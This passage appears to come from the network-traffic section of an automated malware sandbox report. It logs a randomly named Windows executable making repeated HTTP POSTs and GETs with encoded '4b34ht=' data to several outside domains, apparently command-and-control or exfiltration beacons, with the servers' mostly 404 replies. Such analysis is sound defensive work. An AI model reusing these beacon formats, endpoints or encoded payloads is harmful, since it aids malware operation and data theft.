                                          Data Raw: 34 62 33 34 68 74 3d 61 54 67 4e 6c 77 36 41 6c 56 6d 33 69 76 76 49 76 59 59 38 64 70 65 52 32 4c 42 6f 6d 4a 5a 43 49 42 53 66 4a 64 67 64 43 79 38 73 33 54 75 35 4f 34 65 31 2b 63 39 65 59 37 51 70 33 4f 4d 62 30 68 4e 7a 73 44 34 76 52 64 41 6d 63 32 37 31 41 68 53 59 65 2b 6c 65 7a 6e 47 32 4f 2f 48 43 4d 4e 50 61 6c 6f 32 6a 77 38 6d 35 79 31 38 61 61 65 5a 76 78 52 58 4f 65 7a 6e 33 43 6a 74 71 6f 49 2b 35 46 73 47 49 6e 32 63 32 74 65 75 6b 42 75 53 4d 69 59 6c 54 37 56 71 2b 4a 77 7a 5a 37 6e 49 68 4f 2f 45 52 70 55 33 54 76 66 33 4c 36 49 77 51 45 2f 4d 6b 4f 31 45 4d 70 38 37 77 57 51 41 38 42 54 52 78 64 4a 78 49 30 4d 62 72 33 75 4a 2b 69 75 61 47 6f 72 45 7a 72 66 32 73 41 2b 38 47 57 34 51 42 54 70 4e 4e 6a 31 4e 45 2b 63 44 76 6b 6d 53 41 6e 54 49 69 33 4b 72 71 55 4d 46 39 66 55 71 72 48 45 6f 45 4e 54 73 59 36 74 57 66 63 32 2b 62 42 61 4a 4d 4b 65 5a 61 6c 63 38 51 4b 4c 67 42 54 52 37 75 63 79 54 47 6f 43 63 75 42 6b 44 68 59 34 4a 4c 4e 2b 33 6a 43 68 62 30 2b 51 52 51 63 73 69 [TRUNCATED]
                                          Data Ascii: 4b34ht= [TRUNCATED]
                                          May 27, 2024 12:43:27.029170990 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                          content-type: text/html; charset=UTF-8
                                          x-request-id: 891f0020-4b7d-44c7-b130-4fd4745d6a3b
                                          x-runtime: 0.023335
                                          content-length: 19239
                                          connection: close
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          8 | 192.168.2.5 | 49723 | 216.40.34.41 | 80 | 6408 | C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          May 27, 2024 12:43:29.047327042 CEST | 503 | OUT | GET /wouf/?4b34ht=XRItmHXywGWVnqDngINAMvff3IpqjclEV1ySHuRZOTcLzBiyF5+l3MoobodW+p084j4Tu28tOugkX2LbOW2aRLZQ/Vv/K47AM9XykbCYypLB0HUyScM9sRvicmb0LC0c/g==&UxF=2Nflznk0WJ3hjv HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.botcsllc.com
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          May 27, 2024 12:43:29.528601885 CEST | 1236 | IN | HTTP/1.1 200 OK
                                          x-frame-options: SAMEORIGIN
                                          x-xss-protection: 1; mode=block
                                          x-content-type-options: nosniff
                                          x-download-options: noopen
                                          x-permitted-cross-domain-policies: none
                                          referrer-policy: strict-origin-when-cross-origin
                                          content-type: text/html; charset=utf-8
                                          etag: W/"716ddccefe706082230daa01e9261cc7"
                                          cache-control: max-age=0, private, must-revalidate
                                          x-request-id: e8e124a6-3d8c-4af8-8bd6-fa4faf4486b2
                                          x-runtime: 0.003471
                                          transfer-encoding: chunked
                                          connection: close
                                          Data Ascii: 14B1<!DOCTYPE html><html><head><meta content='text/html; charset=UTF-8' http-equiv='Content-Type'><meta content='3CbaVvw-I7MlrmmmHz0bfbko7oMCW1mn2u65uWsWWB8' name='google-site-verification'><meta content='width=device-width, initial-scale=1.0' name='viewport'><meta content='telephone=no' name='format-detection'><link href='data:;base64,iVBORw0KGgo=' rel='icon'><title>botcsllc.com is expired</title><link rel="stylesheet" media="screen" href="https://fonts.googleapis.com/css?family=Open+Sans:300,400,600,700" /><link rel="stylesheet" media="all" href="/assets/application-2f7e7f30d812d0f3950918c7562df7e68eeeebd8649bdea2bc3844eb07fc8269.css" /></head><body><header><a rel="nofollow" href="https://www.hover.com/?source=expired">


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          9 | 192.168.2.5 | 49724 | 31.31.196.16 | 80 | 6408 | C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          May 27, 2024 12:43:34.702189922 CEST | 765 | OUT | POST /k2o4/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.pilatovparts.ru
                                          Origin: http://www.pilatovparts.ru
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 207
                                          Referer: http://www.pilatovparts.ru/k2o4/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Ascii: 4b34ht=nQduVhK+I4mwiKbCMSUhg8ENQum6DfwaPoS1UhLhr/QummT8waSi26igsSfUHWzE/DtL9Hul1zjr212R51F399IkaQG82nIWCA080+tSz/BTw15GiZN7bXFPpB4ZuKeEcsLwxzh96pKtOA4i4HXM5tE/9RUgRJorwbJQiQtrw/vZutEKOAZtk5YUEeJV3M6L1Zcs/cY=
                                          May 27, 2024 12:43:35.410310984 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 27 May 2024 10:43:35 GMT
                                          Content-Type: text/html; charset=utf-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Content-Encoding: gzip


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          10 | 192.168.2.5 | 49725 | 31.31.196.16 | 80 | 6408 | C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          May 27, 2024 12:43:37.234286070 CEST | 785 | OUT | POST /k2o4/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.pilatovparts.ru
                                          Origin: http://www.pilatovparts.ru
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 227
                                          Referer: http://www.pilatovparts.ru/k2o4/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Ascii: 4b34ht=nQduVhK+I4mwzbrCOzUh3MEOJem6avwePoO1UjmsrKguj2j8xY6i6aigiyfRYmzx/Dp59Dul1z3r21mR5Gd27tImDAG+7HIWCA080+R0z/ZTzEJGh4N6YXFIqB4Z56eAcsLCxysY6sOtOBIi4y7P3tF0iBU0fp9j0r9HvWwDpMykvbpgUiRF3Z0sUNBim8biv6MchLNGD+Jv/5wBgoHRSx1hKGlF
                                          May 27, 2024 12:43:37.958427906 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 27 May 2024 10:43:37 GMT
                                          Content-Type: text/html; charset=utf-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Content-Encoding: gzip
                                          May 27, 2024 12:43:37.964329958 CEST1236INData Raw: 59 49 24 37 95 41 52 40 01 b6 42 cb 47 c8 55 51 a5 4c 15 d5 81 02 12 11 5e 8a 28 37 c0 43 e0 b3 0c 84 c9 d8 ea 31 08 80 0a 8c 18 13 e1 19 09 72 9a a3 ef e4 77 da bb ef 8b 1c 95 51 7a 86 9d d1 08 9a 35 1b 00 05 32 e9 2d e0 ab a8 00 8a 01 74 d1 10
                                          Data Ascii: YI$7AR@BGUQL^(7C1rwQz52-t&J&8@;QH. x@5`@Zg`$@)* *S-R@J/G?DT@C<#wa\%$m)lF!vOlx`8w


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          11 | 192.168.2.5 | 49726 | 31.31.196.16 | 80 | 6408 | C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          May 27, 2024 12:43:39.767885923 CEST | 1802 | OUT | POST /k2o4/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.pilatovparts.ru
                                          Origin: http://www.pilatovparts.ru
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 1243
                                          Referer: http://www.pilatovparts.ru/k2o4/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          May 27, 2024 12:43:40.602276087 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 27 May 2024 10:43:40 GMT
                                          Content-Type: text/html; charset=utf-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Content-Encoding: gzip


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          12 | 192.168.2.5 | 49727 | 31.31.196.16 | 80 | 6408 | C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          May 27, 2024 12:43:42.301762104 CEST | 506 | OUT | GET /k2o4/?4b34ht=qS1OWRHNQ56Cw7+fPD172OEEUbCPY94RPpebPz6xreoqxXbgy7Cu/Z+GqTqWS2Pyzkow4Xyx1yLx23Wbx34O9asPPjW4w1AqTiokyKtl/e0W2Htu8J9pM1VOgBMsot7LIg==&UxF=2Nflznk0WJ3hjv HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.pilatovparts.ru
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          May 27, 2024 12:43:43.025707006 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 27 May 2024 10:43:42 GMT
                                          Content-Type: text/html; charset=utf-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Vary: Accept-Encoding


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          13 | 192.168.2.5 | 49728 | 183.181.79.111 | 80 | 6408 | C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          May 27, 2024 12:43:49.064804077 CEST | 759 | OUT | POST /fx5q/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.cica-rank.com
                                          Origin: http://www.cica-rank.com
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 207
                                          Referer: http://www.cica-rank.com/fx5q/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          May 27, 2024 12:43:49.870877981 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 27 May 2024 10:43:49 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Last-Modified: Mon, 11 Feb 2019 04:23:44 GMT
                                          ETag: W/"afe-58196ac9aed38"
                                          Content-Encoding: br


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          14 | 192.168.2.5 | 49729 | 183.181.79.111 | 80 | 6408 | C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          May 27, 2024 12:43:52.094096899 CEST | 779 | OUT | POST /fx5q/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.cica-rank.com
                                          Origin: http://www.cica-rank.com
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 227
                                          Referer: http://www.cica-rank.com/fx5q/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          May 27, 2024 12:43:52.912378073 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 27 May 2024 10:43:52 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Last-Modified: Mon, 11 Feb 2019 04:23:44 GMT
                                          ETag: W/"afe-58196ac9aed38"
                                          Content-Encoding: br


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          15 | 192.168.2.5 | 49730 | 183.181.79.111 | 80 | 6408 | C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          May 27, 2024 12:43:54.625272036 CEST | 1796 | OUT | POST /fx5q/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.cica-rank.com
                                          Origin: http://www.cica-rank.com
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 1243
                                          Referer: http://www.cica-rank.com/fx5q/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          May 27, 2024 12:43:55.487293005 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 27 May 2024 10:43:55 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Last-Modified: Mon, 11 Feb 2019 04:23:44 GMT
                                          ETag: W/"afe-58196ac9aed38"
                                          Content-Encoding: br


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          16 | 192.168.2.5 | 49731 | 183.181.79.111 | 80 | 6408 | C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          May 27, 2024 12:43:57.157571077 CEST | 504 | OUT | GET /fx5q/?4b34ht=58zXcaw4QDLVkaL+G0qZOwfYBtfLZlBf9k0Qnw1Zv4bR0GQyFI5ORfMwVsCUT1zQejwif13gDfh0mdA+c9yRzCT9PqSg1LoC16c3+fSR0wz9mE2aSN+j+I+5sdCG7jTd0Q==&UxF=2Nflznk0WJ3hjv HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.cica-rank.com
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          May 27, 2024 12:43:57.961004972 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 27 May 2024 10:43:57 GMT
                                          Content-Type: text/html
                                          Content-Length: 2814
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Last-Modified: Mon, 11 Feb 2019 04:23:44 GMT
                                          ETag: "afe-58196ac9aed38"
                                          Data Ascii: <!DOCTYPE html><html lang="ja"><head><meta charset="EUC-JP" /><title>404 File Not Found</title><meta name="copyright" content="Copyright XSERVER Inc."><meta name="robots" content="INDEX,FOLLOW" /><meta name="viewport" content="width=device-width,initial-scale=1.0,minimum-scale=1.0"><style type="text/css">* { margin: 0; padding: 0;}img { border: 0;}ul { padding-left: 2em;}html { overflow-y: scroll; background: #3b79b7;}body { font-family: "", Meiryo, " ", "MS PGothic", " Pro W3", "Hiragino Kaku Gothic Pro", sans-serif; margin: 0; line-height: 1.4; font-size: 75%; text-align: center; color: white;}h1 { font-size: 24px; font-weight: bold;}h1 { font-weight: bold; line-height: 1; padding-bottom: 20px; font-family: Helvetica, sans-serif;}h2 { text-align: center; font-weight: bold; font-size: 27px;}p { text-align: center; font-size: 14px;
                                          May 27, 2024 12:43:57.961033106 CEST | 224 | IN
                                          Data Ascii: margin: 0; padding: 0; color: white;}.explain { border-top: 1px solid #fff; border-bottom: 1px solid #fff; line-height: 1.5; margin: 30px auto; padding: 17px;}#cause { text-align: left;
                                          May 27, 2024 12:43:57.961052895 CEST | 1236 | IN
                                          Data Ascii: }#cause li { color: #666;}h3 { letter-spacing: 1px; font-weight: bold; padding: 0;}#white_box { margin: 15px auto 0; background-color: white;}/* ==================== ======================= *
                                          May 27, 2024 12:43:57.961071968 CEST | 358 | IN
                                          Data Ascii: </p> <h3></h3> <div id="white_box"> <div id="cause"> <ul> <li></li> <li>UR


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          17 | 192.168.2.5 | 49732 | 78.142.211.199 | 80 | 6408 | C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          May 27, 2024 12:44:03.019870043 CEST | 759 | OUT | POST /l1oh/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.diplocity.org
                                          Origin: http://www.diplocity.org
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 207
                                          Referer: http://www.diplocity.org/l1oh/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          May 27, 2024 12:44:03.742676973 CEST | 492 | IN | HTTP/1.1 404 Not Found
                                          Content-Type: text/html; charset=us-ascii
                                          Server: Microsoft-HTTPAPI/2.0
                                          Date: Mon, 27 May 2024 10:44:03 GMT
                                          Connection: close
                                          Content-Length: 315
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          18 | 192.168.2.5 | 49733 | 78.142.211.199 | 80 | 6408 | C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          May 27, 2024 12:44:05.556211948 CEST | 779 | OUT | POST /l1oh/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.diplocity.org
                                          Origin: http://www.diplocity.org
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 227
                                          Referer: http://www.diplocity.org/l1oh/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          May 27, 2024 12:44:06.289916039 CEST | 492 | IN | HTTP/1.1 404 Not Found
                                          Content-Type: text/html; charset=us-ascii
                                          Server: Microsoft-HTTPAPI/2.0
                                          Date: Mon, 27 May 2024 10:44:05 GMT
                                          Connection: close
                                          Content-Length: 315
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          19 | 192.168.2.5 | 49734 | 78.142.211.199 | 80 | 6408 | C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          May 27, 2024 12:44:08.753509998 CEST | 1796 | OUT | POST /l1oh/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.diplocity.org
                                          Origin: http://www.diplocity.org
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 1243
                                          Referer: http://www.diplocity.org/l1oh/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          May 27, 2024 12:44:09.485321999 CEST | 492 | IN | HTTP/1.1 404 Not Found
                                          Content-Type: text/html; charset=us-ascii
                                          Server: Microsoft-HTTPAPI/2.0
                                          Date: Mon, 27 May 2024 10:44:09 GMT
                                          Connection: close
                                          Content-Length: 315
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          20 | 192.168.2.5 | 49735 | 78.142.211.199 | 80 | 6408 | C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          May 27, 2024 12:44:11.323120117 CEST | 504 | OUT | GET /l1oh/?4b34ht=CLj62WE97PINjru9/2Ua0S4wJ+6clgTBZzFqYLe+Zb/mrkE/j+GqxKOEwyxDIhmnv5tawjcWYXQUR2YOfRR5ys/k8mvsQ8S8w9omXjrMO8RJvp8vgkkqsEYyw/rrHr7WOA==&UxF=2Nflznk0WJ3hjv HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.diplocity.org
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          May 27, 2024 12:44:12.068820953 CEST | 492 | IN | HTTP/1.1 404 Not Found
                                          Content-Type: text/html; charset=us-ascii
                                          Server: Microsoft-HTTPAPI/2.0
                                          Date: Mon, 27 May 2024 10:44:11 GMT
                                          Connection: close
                                          Content-Length: 315
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          21 | 192.168.2.5 | 49736 | 66.29.149.46 | 80 | 6408 | C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          May 27, 2024 12:44:17.109657049 CEST | 756 | OUT | POST /ewqf/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.falldove.top
                                          Origin: http://www.falldove.top
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 207
                                          Referer: http://www.falldove.top/ewqf/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          May 27, 2024 12:44:17.711313009 CEST | 637 | IN | HTTP/1.1 404 Not Found
                                          Date: Mon, 27 May 2024 10:44:17 GMT
                                          Server: Apache
                                          Content-Length: 493
                                          Connection: close
                                          Content-Type: text/html
                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                          22          192.168.2.5  49737        66.29.149.46    80                6408  C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          Timestamp                             Bytes transferred  Direction  Data
                                          May 27, 2024 12:44:19.641788960 CEST  776                OUT        POST /ewqf/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
